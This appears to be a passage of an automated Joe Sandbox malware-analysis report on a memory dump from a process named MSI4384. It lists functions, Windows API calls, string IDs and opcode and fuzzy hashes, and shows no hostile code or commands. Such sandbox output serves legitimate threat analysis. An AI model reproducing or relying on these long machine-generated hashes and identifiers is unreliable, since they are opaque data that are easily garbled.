                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: 4656811069a8f74d9988c22eab74c56a1821305e0b515d6f30ac644958ef5256
                                                                    • Instruction ID: 00408afe52093db38381965393d37f777bb2c8ba07a7c9515cc6a5e669064253
                                                                    • Opcode Fuzzy Hash: 4656811069a8f74d9988c22eab74c56a1821305e0b515d6f30ac644958ef5256
                                                                    • Instruction Fuzzy Hash: 52E04F30684604B7EF211F61EC06F5A3F55AB11F52F304032FA4CE81E2E7EAE958958D
                                                                    Function 00449557 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449561
                                                                    • ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449594
                                                                    • WakeAllConditionVariable.KERNEL32(00483B70,?,?,004226B7,00484714,0046EC90), ref: 0044959F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                    • String ID: t;H
                                                                    • API String ID: 1466638765-3893116676
                                                                    • Opcode ID: 0b7c40530ce7dfa28e754404c92fa8c26113df17da0b9e9c202a1eaf433f00ec
                                                                    • Instruction ID: e211024d9241d86e8dd56d4cef01755284b509274409170c8627337203834e7f
                                                                    • Opcode Fuzzy Hash: 0b7c40530ce7dfa28e754404c92fa8c26113df17da0b9e9c202a1eaf433f00ec
                                                                    • Instruction Fuzzy Hash: 06F039B5901200DFC304EF58FA48E9837E9FB0A756B10083EEA4583321DBB46900CBAD
                                                                    Function 0044952C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(00483B74), ref: 00449536
                                                                    • ReleaseSRWLockExclusive.KERNEL32(00483B74), ref: 00449543
                                                                    • WakeAllConditionVariable.KERNEL32(00483B70), ref: 0044954E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                    • String ID: t;H
                                                                    • API String ID: 1466638765-3893116676
                                                                    • Opcode ID: c587e26bad70a05fe4ab1df0c1c119198cba23e6daae887b9a99d971af584877
                                                                    • Instruction ID: bd6cc52a44f04ffb05879a74949db6a83ce9d5c53843998d70e0c8201294158f
                                                                    • Opcode Fuzzy Hash: c587e26bad70a05fe4ab1df0c1c119198cba23e6daae887b9a99d971af584877
                                                                    • Instruction Fuzzy Hash: 6ED09232546125EBC3006B95FC08AD97BA8EB0A7BBB110072F58982111A7A469048BEA
                                                                    Function 0042ED00 Relevance: 6.5, APIs: 4, Instructions: 460COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _strcspn.LIBCMT ref: 0042EDA1
                                                                    • _strcspn.LIBCMT ref: 0042EDC5
                                                                      • Part of subcall function 0042B410: LocalAlloc.KERNEL32(00000040,F3E5235D,F3E52339,00000000,?,?,F3E52339,00000001,?,?,?,?,F3E52339,00000000,?), ref: 0042B466
                                                                      • Part of subcall function 0042B410: LocalFree.KERNEL32(F3E52339,?,?,?,?,?,?,F3E52339,00000001,?,?,?,?,F3E52339,00000000,?), ref: 0042B55D
                                                                    • LocalFree.KERNEL32(?), ref: 0042F1A5
                                                                    • LocalFree.KERNEL32(?), ref: 0042F1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$_strcspn$Alloc
                                                                    • String ID:
                                                                    • API String ID: 3422560186-0
                                                                    • Opcode ID: fac41fa2167349576140bd047e94d962d45f17da4c15d1997d2b34bd4778c898
                                                                    • Instruction ID: 2db11c599fa7f4499fde201656164eef96068ae3e8f03f578e3baf09bb04e4a5
                                                                    • Opcode Fuzzy Hash: fac41fa2167349576140bd047e94d962d45f17da4c15d1997d2b34bd4778c898
                                                                    • Instruction Fuzzy Hash: AB02A775E00219DFDB00CFA5D844AEEBBB5FF88304F94416AE805AB351DB38AD46CB95
                                                                    Function 00468298 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(F3E52339,00000000,00000000,?), ref: 004682FB
                                                                      • Part of subcall function 004612CA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,00000000,?,-00000008,-00000008,00000000,?,?,0045EB45,?,00000000), ref: 00461329
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00468551
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00468597
                                                                    • GetLastError.KERNEL32 ref: 0046863A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: 751f86b87d233da4485cedf1cc23a84c3a2b08ab3ae57753b24cc68c846fc0c2
                                                                    • Instruction ID: a0f7f86aaf50bf9eb8d28c9a87ffa0524df5e356c818a0a9ef236141c6cad584
                                                                    • Opcode Fuzzy Hash: 751f86b87d233da4485cedf1cc23a84c3a2b08ab3ae57753b24cc68c846fc0c2
                                                                    • Instruction Fuzzy Hash: C6D1AF75D002489FCF15CFA8D8809AEBBB5FF09314F24422EE856EB351EA34A942CB55
                                                                    Function 0044CE2A Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 29daa17f5ce303a0e334066e416f4272dfb071feb924155730f31d6ae1e966b3
                                                                    • Instruction ID: 76ee2c4e8bb5bf8c7b3d7d04fc5d5f4381f75bbf961c206339b93ebb319298d4
                                                                    • Opcode Fuzzy Hash: 29daa17f5ce303a0e334066e416f4272dfb071feb924155730f31d6ae1e966b3
                                                                    • Instruction Fuzzy Hash: 04510272602202AFFB658F51D881B7A73A6EF04704F28452FEC05472D1E73DAC59C799
                                                                    Function 00424960 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 160memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,/CB,?,00000000,?), ref: 004249BA
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,/CB,?,00000000,?), ref: 00424A04
                                                                    • LocalFree.KERNEL32(00000000,?,/CB,?,00000000,?), ref: 00424A85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free
                                                                    • String ID: /CB
                                                                    • API String ID: 209276640-2413225141
                                                                    • Opcode ID: dfcac3467d2ed79a410cd27885314d5494b4db49b588496b7025b9fcd91d1d4e
                                                                    • Instruction ID: 73b69d04cd8254daa7bab4bb91ba3f4adab2048f56b1a21dc64ed7dfc148789c
                                                                    • Opcode Fuzzy Hash: dfcac3467d2ed79a410cd27885314d5494b4db49b588496b7025b9fcd91d1d4e
                                                                    • Instruction Fuzzy Hash: 1C41F0727042258BDB04DF68E88196FB3D5EBC8350B540A3EF951C7381EA74D919C7AA
                                                                    Function 00424850 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,?,?,0042432F,00000000,?), ref: 004248C9
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,?,?,0042432F,00000000,?), ref: 004248E5
                                                                    • LocalFree.KERNEL32(?,00000000,?), ref: 0042493B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free
                                                                    • String ID: /CB
                                                                    • API String ID: 209276640-2413225141
                                                                    • Opcode ID: 50342dee06f7c7ae8ff920ab75beafef065f4e17bd3430c3df40a55e0ecbdffb
                                                                    • Instruction ID: 35e98465c8f43c8cc78a396907d2a825e16c0a80f56e927c16bd25cab9ec259e
                                                                    • Opcode Fuzzy Hash: 50342dee06f7c7ae8ff920ab75beafef065f4e17bd3430c3df40a55e0ecbdffb
                                                                    • Instruction Fuzzy Hash: D33138B63002218BD718AF38E844A5F77D5EBC13A4FA4072EE562C72D0EB38DD408619
                                                                    Function 00459D05 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ec67f2d13f226e72c7524f8fc50af9ca961c2320f41c869158a00b56ddd3a10
                                                                    • Instruction ID: 4f425c9868c564c3724c3658a52af1fdcf78f9e480a44fc78ce9871c097b83de
                                                                    • Opcode Fuzzy Hash: 2ec67f2d13f226e72c7524f8fc50af9ca961c2320f41c869158a00b56ddd3a10
                                                                    • Instruction Fuzzy Hash: 8C21A431604205FF9B20AF62DC41D6B77B9FF00369710852AFD5997252EB78EC188769
                                                                    Function 004292A0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00428D7C,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 004292A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                    • API String ID: 1452528299-1781106413
                                                                    • Opcode ID: 1a66fd132c50b9d195aa886b9204d760b49211ed7e8f2959ca77b1946543061e
                                                                    • Instruction ID: fee5028da73306ad88b1ea6833641138363020b42d2743972305d3236a97c68c
                                                                    • Opcode Fuzzy Hash: 1a66fd132c50b9d195aa886b9204d760b49211ed7e8f2959ca77b1946543061e
                                                                    • Instruction Fuzzy Hash: FB215E49B1026287CB745F3C940127AB2E5AF98755F65486FDCC8D7390EAAD8C82C399
                                                                    Function 004349F5 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004349FC
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00434AB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                    • String ID:
                                                                    • API String ID: 4244582100-0
                                                                    • Opcode ID: a76138a12a83b20432db0f3921b44d423588c66e90c951b93d98928a98bcd3d3
                                                                    • Instruction ID: 5b4f0cdd54eaee2e669b1bad57377e88bc7b7a6f4b889547020e112a26ab6b24
                                                                    • Opcode Fuzzy Hash: a76138a12a83b20432db0f3921b44d423588c66e90c951b93d98928a98bcd3d3
                                                                    • Instruction Fuzzy Hash: A2217C34A40616AFDB04EF15C891AADB771FF88310F00945AE8259B7A1DB74FD14CF88
                                                                    Function 004318C0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,F3E52339), ref: 004318FC
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0043191C
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0043194D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00431966
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                    • String ID:
                                                                    • API String ID: 3604237281-0
                                                                    • Opcode ID: 3efcb6fd287d9e9bdb5687a4d450974ed5083301567b4a84314034e1799eb5d4
                                                                    • Instruction ID: 54ae9f3d883af8acfb07696e78411b84048e474769d29b431808222c8ffd0d32
                                                                    • Opcode Fuzzy Hash: 3efcb6fd287d9e9bdb5687a4d450974ed5083301567b4a84314034e1799eb5d4
                                                                    • Instruction Fuzzy Hash: 752181B0A40314EBD7209F54DC09FAFBBB8FF05B14F20452AF614A72D1E7B85A048799
                                                                    Function 004340DC Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004340E3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004340ED
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043413E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043415E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 05e307a2aaa81329e3f1531711df3107642e6bcef26d6c2377c2ff919ec84427
                                                                    • Instruction ID: 67c17617a1b6a1ae889b341f27aaa8e5b62c81e70c58d17248ea8fccfb77e361
                                                                    • Opcode Fuzzy Hash: 05e307a2aaa81329e3f1531711df3107642e6bcef26d6c2377c2ff919ec84427
                                                                    • Instruction Fuzzy Hash: E80104719005299BCF04FFA5D8556EF7B60AF98718F10441EF510A7391DF7CAE008B89
                                                                    Function 0043B101 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043B108
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043B112
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043B163
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043B183
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: d973f5182ac890c6006b98effd716a5c55bd680f1b09918035e36dbc0fa1e92b
                                                                    • Instruction ID: c358495d3174fff155a41bd43beb636e8a4f8036888d9e4c5be73934cde53a57
                                                                    • Opcode Fuzzy Hash: d973f5182ac890c6006b98effd716a5c55bd680f1b09918035e36dbc0fa1e92b
                                                                    • Instruction Fuzzy Hash: B1010031A00229ABCB08EFA5D8556AE7760EF88758F24441FE510AB381DF789A008BC9
                                                                    Function 00445316 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0044531D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445327
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 00445378
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00445398
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 01747eb94b2d26c8aaa4fa938b4762b14a5f69b5fe4c8e8e899bf3f6e5c32e9f
                                                                    • Instruction ID: b42d2d4730126512722881b481fa87c9b76460b7d75e7c15efc1d91b78433cf9
                                                                    • Opcode Fuzzy Hash: 01747eb94b2d26c8aaa4fa938b4762b14a5f69b5fe4c8e8e899bf3f6e5c32e9f
                                                                    • Instruction Fuzzy Hash: E2010471A001159BDF04FFA5D855AAE7761BF84718F15441EE810AB392DFBC9E008B89
                                                                    Function 0043A4C8 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A4CF
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A4D9
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A52A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A54A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 7ef49e021a2ae7815f9932063dc787f4fc53df501814c29e0ecb4b760d3238b2
                                                                    • Instruction ID: 5e694c75c64ea98b6ea268e218bc631f2f820121877248b288261c4a5171d69b
                                                                    • Opcode Fuzzy Hash: 7ef49e021a2ae7815f9932063dc787f4fc53df501814c29e0ecb4b760d3238b2
                                                                    • Instruction Fuzzy Hash: 01010031900129ABCB04EFA5D845ABE7760AF88718F20041FE411AB381DF7C8E048B8E
                                                                    Function 004454D5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004454DC
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004454E6
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 00445537
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00445557
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
